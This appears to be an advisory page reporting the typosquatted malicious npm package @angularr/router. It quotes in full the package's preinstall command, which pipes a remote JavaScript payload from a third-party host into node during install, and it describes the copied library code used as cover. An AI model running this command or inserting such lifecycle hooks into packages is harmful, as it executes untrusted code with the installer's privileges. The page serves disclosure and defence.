@angularr/router@2.2.0
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC
OSV ID
MAL-2026-17494
Ecosystem
npm
Summary
The package.json preinstall script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an unpinned, unverified JavaScript payload from a third-party repository (gitflic.ru user hellscripter, proxied via web.archive.org) and piping it directly into Node for execution during npm install. The code executes with the installer's privileges before any package code is loaded. The package name @angularr/router (double-r) resembles @angular/router, while the shipped library code is a verbatim copy of pillarjs/router (unrelated to Angular) that serves as cover for the malicious lifecycle hook.
Source: amazon-inspector (646c9fd4e8d09651eb6d5ec997e6d1b62f294d39d52ec3b4143853c922f15e83)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.